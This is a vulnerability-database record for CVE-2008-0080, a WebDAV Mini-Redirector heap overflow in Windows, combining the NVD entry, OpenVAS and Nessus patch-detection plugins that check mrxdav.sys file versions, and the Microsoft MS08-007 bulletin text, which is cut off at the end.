{"cve": [{"lastseen": "2021-02-02T05:35:11", "description": "Heap-based buffer overflow in the WebDAV Mini-Redirector in Microsoft Windows XP SP2, Server 2003 SP1 and SP2, and Vista allows remote attackers to execute arbitrary code via a crafted WebDAV response.", "edition": 4, "cvss3": {}, "published": "2008-02-12T23:00:00", "title": "CVE-2008-0080", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-0080"], "modified": "2018-10-30T16:26:00", "cpe": ["cpe:/a:microsoft:webdav_mini-redirector:*"], "id": "CVE-2008-0080", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-0080", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:microsoft:webdav_mini-redirector:*:*:*:*:*:*:*:*"]}], "openvas": [{"lastseen": "2017-07-02T21:10:14", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-0080"], "description": "This host is missing a critical security update according to\n Microsoft Bulletin MS008-007", "modified": "2017-03-21T00:00:00", "published": "2008-06-17T00:00:00", "id": "OPENVAS:90015", "href": "http://plugins.openvas.org/nasl.php?oid=90015", "type": "openvas", "title": "Mini-Redirector Heap Overflow Vulnerability", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: win_CVE-2008-0080.nasl 5661 2017-03-21 11:39:13Z cfi $\n# Description: Mini-Redirector Heap Overflow Vulnerability\n#\n# Authors:\n# Carsten Koch-Mauthe <c.koch-mauthe at dn-systems.de>\n# Modified to Implement 'smb_nt.inc'\n# - By Nikita MR <rnikita@secpod.com> On 2009-09-18\n# Updated By: Madhuri D <dmadhuri@secpod.com> on 2011-01-05\n# - To get the required file version on windows vista\n#\n# Copyright:\n# Copyright (C) 2008 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ntag_impact = \"Successful exploitation will allow attackers to execute arbitrary code and\n completely compromise the affected computer.\n\n\n Workarounds:\n Disable the WebClient Service.\";\n\ntag_insight = \"A boundary error occurs in the WebDAV Mini-Redirector when handling long\n pathnames in WebDAV responses.\";\ntag_solution = \"Run Windows Update and update the listed hotfixes or download and\n update mentioned hotfixes in the advisory from the below link,\n http://www.microsoft.com/technet/security/bulletin/ms08-007.mspx\";\ntag_summary = \"This host is missing a critical security update according to\n Microsoft Bulletin MS008-007\";\n\n# $Revision: 5661 $\n\nif(description)\n{\n script_id(90015);\n script_version(\"$Revision: 5661 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-03-21 12:39:13 +0100 (Tue, 21 Mar 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-06-17 20:22:38 +0200 (Tue, 17 Jun 2008)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2008-0080\");\n script_bugtraq_id(27670);\n script_name(\"Mini-Redirector Heap Overflow Vulnerability\");\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/28894\");\n script_xref(name : \"URL\" , value : \"http://www.microsoft.com/technet/security/bulletin/ms08-007.mspx\");\n\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_copyright(\"Copyright (C) 2008 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"secpod_reg_enum.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"impact\" , value : tag_impact);\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(xp:3, win2003:3, winVista:3) <= 0)\n{\n exit(0);\n}\n\n# MS08-007 Hotfix check\nif(hotfix_missing(name:\"946026\") == 0)\n{\n exit(0);\n}\n\nsysPath = registry_get_sz(item:\"Install Path\",\n key:\"SOFTWARE\\Microsoft\\COM3\\Setup\");\nif(!sysPath)\n{\n exit(0);\n}\n\nshare = ereg_replace(pattern:\"([A-Z]):.*\", replace:\"\\1$\", string:sysPath);\nfile = ereg_replace(pattern:\"[A-Z]:(.*)\", replace:\"\\1\",\n string:sysPath + \"\\drivers\\mrxdav.sys\");\nsysVer = GetVer(file:file, share:share);\nif(!sysVer)\n{\n exit(0);\n}\n\n# Windows XP\nif(hotfix_check_sp(xp:3) > 0)\n{\n SP = get_kb_item(\"SMB/WinXP/ServicePack\");\n if(\"Service Pack 2\" >< SP)\n {\n # Grep for mrxdav.sys version < 5.1.2600.3276\n if(version_in_range(version:sysVer, test_version:\"5.1\",\n test_version2:\"5.1.2600.3275\")){\n security_message(0);\n }\n }\n else\n security_message(0);\n}\n\n# Windows 2003\nelse if(hotfix_check_sp(win2003:3) > 0)\n{\n SP = get_kb_item(\"SMB/Win2003/ServicePack\");\n if(\"Service Pack 2\" >< SP)\n {\n # Grep for mrxdav.sys version < 5.2.3790.4206\n if(version_in_range(version:sysVer, test_version:\"5.2\",\n test_version2:\"5.2.3790.4205\")){\n security_message(0);\n }\n }\n else if(\"Service Pack 1\" >< SP)\n {\n # Grep for mrxdav.sys version < 5.2.3790.3060\n if(version_in_range(version:sysVer, test_version:\"5.2\",\n test_version2:\"5.2.3790.3059\")){\n security_message(0);\n }\n }\n else\n security_message(0);\n}\n\nsysPath = registry_get_sz(item:\"PathName\",\n key:\"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\");\nif(!sysPath){\n exit(0);\n}\n\nshare = ereg_replace(pattern:\"([A-Z]):.*\", replace:\"\\1$\", string:sysPath);\nfile = ereg_replace(pattern:\"[A-Z]:(.*)\", replace:\"\\1\",\n string:sysPath + \"\\System32\\drivers\\mrxdav.sys\");\nsysVer = GetVer(file:file, share:share);\nif(!sysVer)\n{\n exit(0);\n}\n\n# Windows Vista\nif(hotfix_check_sp(winVista:2) > 0)\n{\n # Grep for mrxdav.sys version < 6.0.6000.16626\n if(version_is_less(version:sysVer, test_version:\"6.0.6000.16626\")){\n security_message(0);\n }\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-04-29T22:26:45", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-0080"], "description": "This host is missing a critical security update according to\n Microsoft Bulletin MS008-007", "modified": "2020-04-27T00:00:00", "published": "2008-06-17T00:00:00", "id": "OPENVAS:136141256231090015", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231090015", "type": "openvas", "title": "Mini-Redirector Heap Overflow Vulnerability", "sourceData": "# OpenVAS Vulnerability Test\n# Description: Mini-Redirector Heap Overflow Vulnerability\n#\n# Authors:\n# Carsten Koch-Mauthe <c.koch-mauthe at dn-systems.de>\n# Modified to Implement 'smb_nt.inc'\n# - By Nikita MR <rnikita@secpod.com> On 2009-09-18\n# Updated By: Madhuri D <dmadhuri@secpod.com> on 2011-01-05\n# - To get the required file version on windows vista\n#\n# Copyright:\n# Copyright (C) 2008 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\n# $Revision: 12602 $\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.90015\");\n script_version(\"2020-04-27T11:04:25+0000\");\n script_tag(name:\"last_modification\", value:\"2020-04-27 11:04:25 +0000 (Mon, 27 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2008-06-17 20:22:38 +0200 (Tue, 17 Jun 2008)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2008-0080\");\n script_bugtraq_id(27670);\n script_name(\"Mini-Redirector Heap Overflow Vulnerability\");\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/28894\");\n script_xref(name:\"URL\", value:\"https://docs.microsoft.com/en-us/security-updates/securitybulletins/2008/ms08-007\");\n\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_copyright(\"Copyright (C) 2008 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"secpod_reg_enum.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/registry_enumerated\");\n\n script_tag(name:\"insight\", value:\"A boundary error occurs in the WebDAV Mini-Redirector when handling long\n pathnames in WebDAV responses.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n script_tag(name:\"summary\", value:\"This host is missing a critical security update according to\n Microsoft Bulletin MS008-007\");\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers to execute arbitrary code and\n completely compromise the affected computer.\n\n\n Workarounds:\n Disable the WebClient Service.\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(xp:3, win2003:3, winVista:3) <= 0)\n{\n exit(0);\n}\n\n# MS08-007 Hotfix check\nif(hotfix_missing(name:\"946026\") == 0)\n{\n exit(0);\n}\n\nsysPath = registry_get_sz(item:\"Install Path\",\n key:\"SOFTWARE\\Microsoft\\COM3\\Setup\");\nif(!sysPath)\n{\n exit(0);\n}\n\nshare = ereg_replace(pattern:\"([A-Z]):.*\", replace:\"\\1$\", string:sysPath);\nfile = ereg_replace(pattern:\"[A-Z]:(.*)\", replace:\"\\1\",\n string:sysPath + \"\\drivers\\mrxdav.sys\");\nsysVer = GetVer(file:file, share:share);\nif(!sysVer)\n{\n exit(0);\n}\n\nif(hotfix_check_sp(xp:3) > 0)\n{\n SP = get_kb_item(\"SMB/WinXP/ServicePack\");\n if(\"Service Pack 2\" >< SP)\n {\n if(version_in_range(version:sysVer, test_version:\"5.1\",\n test_version2:\"5.1.2600.3275\")){\n report = report_fixed_ver(installed_version:sysVer, vulnerable_range:\"5.1 - 5.1.2600.3275\");\n security_message(port: 0, data: report);\n }\n }\n else\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n}\n\nelse if(hotfix_check_sp(win2003:3) > 0)\n{\n SP = get_kb_item(\"SMB/Win2003/ServicePack\");\n if(\"Service Pack 2\" >< SP)\n {\n if(version_in_range(version:sysVer, test_version:\"5.2\",\n test_version2:\"5.2.3790.4205\")){\n report = report_fixed_ver(installed_version:sysVer, vulnerable_range:\"5.2 - 5.2.3790.4205\");\n security_message(port: 0, data: report);\n }\n }\n else if(\"Service Pack 1\" >< SP)\n {\n if(version_in_range(version:sysVer, test_version:\"5.2\",\n test_version2:\"5.2.3790.3059\")){\n report = report_fixed_ver(installed_version:sysVer, vulnerable_range:\"5.2 - 5.2.3790.3059\");\n security_message(port: 0, data: report);\n }\n }\n else\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n}\n\nsysPath = registry_get_sz(item:\"PathName\",\n key:\"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\");\nif(!sysPath){\n exit(0);\n}\n\nshare = ereg_replace(pattern:\"([A-Z]):.*\", replace:\"\\1$\", string:sysPath);\nfile = ereg_replace(pattern:\"[A-Z]:(.*)\", replace:\"\\1\",\n string:sysPath + \"\\System32\\drivers\\mrxdav.sys\");\nsysVer = GetVer(file:file, share:share);\nif(!sysVer)\n{\n exit(0);\n}\n\nif(hotfix_check_sp(winVista:2) > 0)\n{\n if(version_is_less(version:sysVer, test_version:\"6.0.6000.16626\")){\n report = report_fixed_ver(installed_version:sysVer, fixed_version:\"6.0.6000.16626\");\n security_message(port: 0, data: report);\n }\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2020-08-08T13:25:27", "description": "The remote host is running a version of Windows that is vulnerable to a\nflaw that could allow an attacker to execute arbitrary code on the\nremote host.\n\nSpecifically, the remote version of Windows is vulnerable to a flaw in\nthe WebDav Mini-Redirector handler. By sending a specially malformed\nmessage, an attacker may be able to take the complete control of the\nremote system.", "edition": 21, "published": "2008-02-12T00:00:00", "title": "MS08-007: Vulnerability in WebDAV Mini-Redirector Could Allow Remote Code Execution (946026)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-0080"], "modified": "2008-02-12T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS08-007.NASL", "href": "https://www.tenable.com/plugins/nessus/31041", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(31041);\n script_version(\"1.29\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/08/05\");\n\n script_cve_id(\"CVE-2008-0080\");\n script_bugtraq_id(27670);\n script_xref(name:\"MSFT\", value:\"MS08-007\");\n script_xref(name:\"MSKB\", value:\"946026\");\n script_xref(name:\"IAVA\", value:\"2008-A-0005-S\");\n\n script_name(english:\"MS08-007: Vulnerability in WebDAV Mini-Redirector Could Allow Remote Code Execution (946026)\");\n script_summary(english:\"Determines if hotfix 946026 has been installed\");\n\n script_set_attribute(attribute:\"synopsis\", value:\"It is possible to execute arbitrary code on the remote host.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a version of Windows that is vulnerable to a\nflaw that could allow an attacker to execute arbitrary code on the\nremote host.\n\nSpecifically, the remote version of Windows is vulnerable to a flaw in\nthe WebDav Mini-Redirector handler. By sending a specially malformed\nmessage, an attacker may be able to take the complete control of the\nremote system.\");\n # https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2008/ms08-007\n script_set_attribute(attribute:\"see_also\", value:\"https://www.nessus.org/u?32f8e065\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released a set of patches for Windows XP, 2003 and\nVista.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2008-0080\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2008/02/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/02/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/02/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(english:\"This script is Copyright (C) 2008-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, 'Host/patch_management_checks');\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS08-007';\nkb = '946026';\n\nkbs = make_list(kb);\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(xp:'2', win2003:'1,2', vista:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nrootfile = hotfix_get_systemroot();\nif (!rootfile) exit(1, \"Failed to get the system root.\");\n\nshare = hotfix_path2share(path:rootfile);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n hotfix_is_vulnerable(os:\"6.0\", sp:0, file:\"mrxdav.sys\", version:\"6.0.6000.20751\", min_version:\"6.0.6000.20000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.0\", sp:0, file:\"mrxdav.sys\", version:\"6.0.6000.16626\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:kb) ||\n\n hotfix_is_vulnerable(os:\"5.2\", sp:2, arch:\"x86\", file:\"mrxdav.sys\", version:\"5.2.3790.4206\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"5.2\", sp:1, arch:\"x86\", file:\"mrxdav.sys\", version:\"5.2.3790.3060\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"5.2\", sp:1, arch:\"x64\", file:\"mrxdav.sys\", version:\"5.2.3790.3075\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"5.2\", sp:2, arch:\"x64\", file:\"mrxdav.sys\", version:\"5.2.3790.4221\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:kb) ||\n\n hotfix_is_vulnerable(os:\"5.1\", sp:2, file:\"mrxdav.sys\", version:\"5.1.2600.3276\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:kb)\n)\n{\n set_kb_item(name:\"SMB/Missing/\"+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, 'affected');\n}\n", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:25", "bulletinFamily": "software", "cvelist": ["CVE-2008-0080"], "description": "Microsoft Security Bulletin MS08-007 \u2013 Critical\r\nVulnerability in WebDAV Mini-Redirector Could Allow Remote Code Execution (946026)\r\nPublished: February 12, 2008\r\n\r\nVersion: 1.0\r\nGeneral Information\r\nExecutive Summary\r\n\r\nThis critical security update resolves one privately reported vulnerability in the WebDAV Mini-Redirector. An attacker who successfully exploited this vulnerability could take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\r\n\r\nThis is a critical security update for all supported editions of Windows XP and Windows Vista and an important security update for all supported editions of Windows Server 2003. For more information, see the subsection, Affected and Non-Affected Software, in this section.\r\n\r\nThis security update addresses the vulnerability by modifying the way that the Mini-Redirector handles long pathnames. For more information about the vulnerability, see the Frequently Asked Questions (FAQ) subsection for the specific vulnerability entry under the next section, Vulnerability Information.\r\n\r\nRecommendation. Microsoft recommends that customers apply the update immediately\r\n\r\nKnown Issues. None\r\nTop of sectionTop of section\r\nAffected and Non-Affected Software\r\n\r\nThe following software have been tested to determine which versions or editions are affected. Other versions or editions are either past their support life cycle or are not affected. To determine the support life cycle for your software version or edition, visit Microsoft Support Lifecycle.\r\n\r\nAffected Software \r\nOperating System\tMaximum Security Impact\tAggregate Severity Rating\tBulletins Replaced by this Update\r\n\r\nWindows XP Service Pack 2\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\t\r\n\r\nNone\r\n\r\nWindows XP Professional x64 Edition and Windows XP Professional x64 Edition Service Pack 2\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\t\r\n\r\nNone\r\n\r\nWindows Server 2003 Service Pack 1 and Windows Server 2003 Service Pack 2\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nNone\r\n\r\nWindows Server 2003 x64 Edition and Windows 2003 Server x64 Edition Service Pack 2\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nNone\r\n\r\nWindows Server 2003 with SP1 for Itanium-based Systems and Windows Server 2003 with SP2 for Itanium based Systems\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nNone\r\n\r\nWindows Vista\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\t\r\n\r\nNone\r\n\r\nWindows Vista x64 Edition\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\t\r\n\r\nNone\r\n\r\nNon-Affected Software \r\nOperating System\r\n\r\nMicrosoft Windows 2000 Service Pack 4\r\n\r\nWindows Vista Service Pack 1 (all editions)\r\n\r\nWindows Server 2008 (all editions)\r\nTop of sectionTop of section\r\n\t\r\nFrequently Asked Questions (FAQ) Related to This Security Update\r\n\r\nI am using an older release of the software discussed in this security bulletin. What should I do? \r\nThe affected software listed in this bulletin have been tested to determine which releases are affected. Other releases are past their support life cycle. To determine the support life cycle for your software release, visit Microsoft Support Lifecycle.\r\n\r\nIt should be a priority for customers who have older releases of the software to migrate to supported releases to prevent potential exposure to vulnerabilities. For more information about the Windows Product Lifecycle, visit Microsoft Support Lifecycle. For more information about the extended security update support period for these software versions or editions, visit Microsoft Product Support Services.\r\n\r\nCustomers who require custom support for older releases must contact their Microsoft account team representative, their Technical Account Manager, or the appropriate Microsoft partner representative for custom support options. Customers without an Alliance, Premier, or Authorized Contract can contact their local Microsoft sales office. For contact information, visit Microsoft Worldwide Information, select the country, and then click Go to see a list of telephone numbers. When you call, ask to speak with the local Premier Support sales manager. For more information, see the Windows Operating System Product Support Lifecycle FAQ.\r\nTop of sectionTop of section\r\nVulnerability Information\r\n\t\r\nSeverity Ratings and Vulnerability Identifiers\r\nAffected Software\tMini-Redirector Heap Overflow Vulnerability - CVE-2008-0080\tAggregate Severity Rating\r\n\r\nWindows XP Service Pack 2\r\n\t\r\n\r\nCritical \r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\r\nWindows XP Professional x64 Edition and Windows XP Professional x64 Edition Service Pack 2\r\n\t\r\n\r\nCritical \r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\r\nWindows Server 2003 Service Pack 1 and Windows Server 2003 Service Pack 2\r\n\t\r\n\r\nImportant\r\nRemote Code Execution\r\n\t\r\n\r\nImportant\r\n\r\nWindows Server 2003 x64 Edition and Windows 2003 Server x64 Edition Service Pack 2\r\n\t\r\n\r\nImportant\r\nRemote Code Execution\r\n\t\r\n\r\nImportant\r\n\r\nWindows Server 2003 with SP1 for Itanium-based Systems and Windows Server 2003 with SP2 for Itanium based Systems\r\n\t\r\n\r\nImportant\r\nRemote Code Execution\r\n\t\r\n\r\nImportant\r\n\r\nWindows Vista\r\n\t\r\n\r\nCritical \r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\r\nWindows Vista x64 Edition\r\n\t\r\n\r\nCritical \r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\nTop of sectionTop of section\r\n\t\r\nMini-Redirector Heap Overflow Vulnerability - CVE-2008-0080\r\n\r\nA remote code execution vulnerability exists in the way that the WebDAV Mini-Redirector handles responses. An attacker who successfully exploited this vulnerability could take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts.\r\n\r\nTo view this vulnerability as a standard entry in the Common Vulnerabilities and Exposures list, see CVE-2008-0080.\r\n\t\r\nMitigating Factors for Mini-Redirector Heap Overflow Vulnerability - CVE-2008-0080\r\n\r\nMitigation refers to a setting, common configuration, or general best-practice, existing in a default state, that could reduce the severity of exploitation of a vulnerability. The following mitigating factors may be helpful in your situation:\r\n\u2022\t\r\n\r\nWeb Client service is disabled by default in Windows Server 2003.\r\nTop of sectionTop of section\r\n\t\r\nWorkarounds for Mini-Redirector Heap Overflow Vulnerability - CVE-2008-0080\r\n\r\nWorkaround refers to a setting or configuration change that does not correct the underlying vulnerability but would help block known attack vectors before you apply the update. Microsoft has tested the following workarounds and states in the discussion whether a workaround reduces functionality:\r\n\u2022\t\r\n\r\nDisable the Web Client Service\r\n\r\nTo disable the Web Client Service, follow these steps:\r\n\r\n1.\r\n\t\r\n\r\nClick Start, click Run, type Services.msc and then click OK.\r\n\r\n2.\r\n\t\r\n\r\nRight-click WebClient service and select Properties.\r\n\r\n3.\r\n\t\r\n\r\nChange the Startup type to Disabled. If the service is running, click Stop.\r\n\r\n4.\r\n\t\r\n\r\nClick OK and exit the management application.\r\n\u2022\t\r\n\r\nImpact of workaround. WebDAV shares will be inaccessible.\r\n\r\nHow to undo the workaround.To undo the workaround, follow these steps:\r\n\r\n1.\r\n\t\r\n\r\nClick Start, Run, Services.msc and then click OK.\r\n\r\n2.\r\n\t\r\n\r\nRight-click WebClient service and select Properties.\r\n\r\n3.\r\n\t\r\n\r\nChange the Startup type to Automatic and click Apply.\r\n\r\n4.\r\n\t\r\n\r\nClick Start and then click OK and exit the management application.\r\nTop of sectionTop of section\r\n\t\r\nFAQ for Mini-Redirector Heap Overflow Vulnerability - CVE-2008-0080\r\n\r\nWhat is the scope of the vulnerability? \r\nThis is a remote code execution vulnerability. An attacker who successfully exploited this vulnerability could take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights\r\n\r\nWhat causes the vulnerability? \r\nThe Mini-Redirector improperly handles malicious WebDAV response.\r\n\r\nWhat is WebDAV? \r\nWeb Distributed Authoring and Versioning (WebDAV) is an extension to the Hypertext Transfer Protocol (HTTP) that defines how basic file functions such as copy, move, delete and create are performed by using HTTP.\r\n\r\nWhat is a WebDAV Redirector? \r\nA WebDAV Redirector is a remote file system over the WebDAV protocol that allows Windows client machines to connect to your WebDAV publishing directory through the command line. The WebDAV Redirector enables you to manipulate files on the Web as though the files exist on a mapped network drive.\r\n\r\nWhat is the WebDAV mini-redirector? \r\nThe WebDAV mini-redirector is also known as the Web Client service. This service lets DAV-enabled folders appear as UNC (Universal Naming Convention) shares.\r\n\r\nWhat might an attacker use the vulnerability to do? \r\nAn attacker who successfully exploited this vulnerability could run arbitrary code. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\r\n\r\nHow could an attacker exploit the vulnerability? \r\nAn attacker could try to exploit the vulnerability by creating specially crafted WebDAV responses.\r\n\r\nWhat systems are primarily at risk from the vulnerability? \r\nSystems on which WebDAV client service is enabled are primarily at risk. Servers could be at more risk if administrators allow users to log on to servers and to run programs. However, best practices strongly discourage allowing this.\r\n\r\nWhat does the update do? \r\nThe update removes the vulnerability by correctly validating WebDAV response.\r\n\r\nWhen this security bulletin was issued, had this vulnerability been publicly disclosed? \r\nNo. Microsoft received information about this vulnerability through responsible disclosure. Microsoft had not received any information to indicate that this vulnerability had been publicly disclosed when this security bulletin was originally issued. This security bulletin addresses the privately disclosed vulnerability as well as additional issues discovered through internal investigations.\r\n\r\nWhen this security bulletin was issued, had Microsoft received any reports that this vulnerability was being exploited? \r\nNo. Microsoft had not received any information to indicate that this vulnerability had been publicly used to attack customers and had not seen any examples of proof of concept code published when this security bulletin was originally issued.\r\n\r\nOther Information\r\nAcknowledgments\r\n\r\nMicrosoft thanks the following for working with us to help protect customers:\r\n\u2022\t\r\n\r\nSteven of COSEINC Vulnerability Research Lab for reporting the WebDAV Mini-Redirector Heap Overflow Vulnerability (CVE-2008-0080).\r\n\r\nSupport\r\n\u2022\t\r\n\r\nCustomers in the U.S. and Canada can receive technical support from Microsoft Product Support Services at 1-866-PCSAFETY. There is no charge for support calls that are associated with security updates.\r\n\u2022\t\r\n\r\nInternational customers can receive support from their local Microsoft subsidiaries. There is no charge for support that is associated with security updates. For more information about how to contact Microsoft for support issues, visit the International Support Web site.\r\n\r\nDisclaimer\r\n\r\nThe information provided in the Microsoft Knowledge Base is provided "as is" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states 